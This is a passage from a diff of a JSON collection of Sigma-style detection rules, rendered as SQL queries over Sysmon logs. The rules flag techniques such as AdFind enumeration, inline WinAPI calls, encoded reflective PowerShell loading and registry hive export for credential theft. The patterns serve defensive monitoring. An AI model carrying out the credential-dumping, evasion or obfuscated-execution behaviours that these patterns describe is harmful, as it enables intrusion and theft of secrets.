"455b9d50-15a1-4b99-853f-8d37655a4c1b", + "status": "experimental", + "description": "Detects active directory enumeration activity using known AdFind CLI flags", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Administration activity" + "Authorized administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = 
'1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\setspn.exe' ESCAPE '\\' OR OriginalFileName = 'setspn.exe' OR (Description LIKE '%Query or reset the computer%' ESCAPE '\\' AND Description LIKE '%SPN attribute%' ESCAPE '\\')) AND CommandLine LIKE '%-q%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE '\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_setspn_spn_enumeration.yml" + "filename": "proc_creation_win_pua_adfind_enumeration.yml" }, { - "title": "Ruby Inline Command Execution", - "id": "20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8", + "title": "Potential WinAPI Calls Via CommandLine", + "id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", "status": "experimental", - "description": "Detects execution of ruby using the \"-e\" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.", + "description": "Detects the use of WinAPI Functions via the commandline. 
As seen used by threat actors via the tool winapiexec", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1106" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ruby.exe' ESCAPE '\\' OR OriginalFileName = 'ruby.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' 
OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE '%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ruby_inline_command_execution.yml" + "filename": "proc_creation_win_susp_inline_win_api_access.yml" }, { - "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", - "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", + "title": "Potential Command Line Path Traversal Evasion Attempt", + "id": "1327381e-6ab0-4f38-b583-4c1b8346a56b", "status": "experimental", - "description": "Detects known WMI recon method to look for unquoted service paths using wmic. 
Often used by pentester and attacker enumeration scripts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Unknown" + "Google Drive", + "Citrix" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Windows\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\..\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\..\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.exe\\\\..\\\\%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\Google\\\\Drive\\\\googledrivesync.exe\\\\..\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\Citrix\\\\Virtual Smart Card\\\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\\\..\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" + "filename": "proc_creation_win_susp_commandline_path_traversal_evasion.yml" }, { - "title": "Sysmon Driver Unloaded Via Fltmc.EXE", - "id": "4d7cda18-1b12-4e52-b45c-d28653210df8", + "title": "PowerShell Base64 Encoded Reflective Assembly Load", + "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", "status": "test", - "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", - "author": "Kirill Kiryanov, oscd.community", + "description": "Detects base64 encoded .NET reflective loading of 
Assembly", + "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + "attack.t1027", + "attack.t1620" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" - }, - { - "title": "File Download Using ProtocolHandler.exe", - "id": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", - "status": "experimental", - "description": "Detects usage of \"ProtocolHandler\" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE)", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\protocolhandler.exe' ESCAPE '\\' OR OriginalFileName = 'ProtocolHandler.exe') AND ((CommandLine LIKE '%\"ms-word%' ESCAPE '\\' AND CommandLine LIKE '%.docx\"%' ESCAPE '\\') OR CommandLine LIKE '% http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE 
'%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE '%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE '%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_protocolhandler_download.yml" + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load.yml" }, { - "title": "Arbitrary Command Execution Using WSL", - "id": "dec44ca7-61ad-493c-bfd7-8819c5faa09b", + "title": "Suspicious Rundll32 Setupapi.dll Activity", + "id": "285b85b1-a555-4095-8652-a8a4106af63f", "status": "test", - "description": "Detects Possible usage of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary linux and windows commands", - "author": "oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali", + "description": "setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. 
This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.", + "author": "Konstantin Grishchenko, oscd.community", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1218.011" ], "falsepositives": [ - "Automation and orchestration scripts may use this method to execute scripts etc.", - "Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)" + "Scripts and administrative tools that use INF files for driver installation with setupapi.dll" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR OriginalFileName = 'wsl.exe') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --exec%' ESCAPE '\\' OR CommandLine LIKE '% --system%' ESCAPE '\\' OR CommandLine LIKE '% --shell-type %' ESCAPE '\\' OR CommandLine LIKE '% /mnt/c%' ESCAPE '\\' OR CommandLine LIKE '% --user root%' ESCAPE '\\' OR CommandLine LIKE '% -u root%' ESCAPE '\\')) AND NOT ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -e kill %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND ParentCommandLine LIKE '%InstallHinfSection%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_susp_wsl.yml" + "filename": "proc_creation_win_rundll32_setupapi_installhinfsection.yml" }, { - "title": "Suspicious Execution of Powershell with Base64", - "id": "fb843269-508c-4b76-8b8d-88679db22ce7", - "status": 
"experimental", - "description": "Commandline to launch powershell with a base64 payload", + "title": "Use of PktMon.exe", + "id": "f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", + "status": "test", + "description": "Tools to Capture Network Packets on the windows 10 with October 2018 Update or later.", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1040" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% -Encoding %' ESCAPE '\\') OR ((ParentImage LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pktmon.exe' ESCAPE '\\' OR OriginalFileName = 'PktMon.exe'))" ], - "filename": "proc_creation_win_powershell_encode.yml" + "filename": "proc_creation_win_lolbin_pktmon.yml" }, { - "title": "Regsvr32 Flags Anomaly", - "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", + "title": "XSL Script Processing", + "id": "05c36dd6-79d6-4a9a-97da-3db20298ab2d", "status": "test", - "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", - "author": "Florian Roth (Nextron Systems)", + "description": "Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. 
Rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.", + "author": "Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel", "tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.t1220" ], "falsepositives": [ - "Unknown" + "WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.", + "Msxsl.exe is not installed by default, so unlikely.", + "Static format arguments - https://petri.com/command-line-wmi-part-3" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND (CommandLine LIKE '%/format%' ESCAPE '\\' OR CommandLine LIKE '%-format%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Format:List%' ESCAPE '\\' OR CommandLine LIKE '%Format:htable%' ESCAPE '\\' OR CommandLine LIKE '%Format:hform%' ESCAPE '\\' OR CommandLine LIKE '%Format:table%' ESCAPE '\\' OR CommandLine LIKE '%Format:mof%' ESCAPE '\\' OR CommandLine LIKE '%Format:value%' ESCAPE '\\' OR CommandLine LIKE '%Format:rawxml%' ESCAPE '\\' OR CommandLine LIKE '%Format:xml%' ESCAPE '\\' OR CommandLine LIKE '%Format:csv%' ESCAPE '\\'))) OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" + "filename": "proc_creation_win_wmic_xsl_script_processing.yml" }, { - "title": "Suspicious PowerShell Parameter Substring", - "id": "36210e0d-5b19-485d-a087-c096088885f0", - "status": "test", - "description": "Detects suspicious PowerShell invocation with a parameter substring", - "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), 
Roberto Rodriguez (Fix)", + "title": "Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell", + "id": "692f0bec-83ba-4d04-af7e-e884a96059b6", + "status": "stable", + "description": "Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI.", + "author": "Markus Neis @Karneades", "tags": [ "attack.execution", + "attack.t1047", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "AppvClient", + "CCM", + "WinRM" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR 
CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE 
'\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin %' ESCAPE '\\' OR CommandLine LIKE '% /nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE '\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE 
((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" ], - "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" + "filename": "proc_creation_win_wmiprvse_spawns_powershell.yml" }, { - "title": "New Remote Desktop Connection Initiated Via Mstsc.EXE", - "id": "954f0af7-62dd-418f-b3df-a84bc2c7a774", - "status": "experimental", - "description": "Detects the usage of \"mstsc.exe\" with the \"/v\" flag to initiate a connection to a remote server.\nAdversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\n", - "author": "frack113", + "title": "Exports Registry Key To a File", + "id": "f0e53e89-8d22-46ea-9db5-9d4796ee2f8a", + "status": "test", + "description": "Detects the export of the target Registry key to a file.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1021.001" + "attack.exfiltration", + "attack.t1012" ], "falsepositives": [ - "WSL (Windows Sub System For Linux)", - "Other currently unknown software" + "Legitimate export of keys" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND CommandLine LIKE '% /v:%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\lxss\\\\wslhost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Microsoft\\\\WSL\\\\wslg.rdp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND 
(CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\')) AND ((CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_mstsc_remote_connection.yml" + "filename": "proc_creation_win_regedit_export_keys.yml" }, { - "title": "Suspicious File Download via CertOC.exe", - "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", - "status": "experimental", - "description": "Detects when a user downloads file by using CertOC.exe", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Reg Add Open Command", + "id": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563", + "status": "test", + "description": "Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE 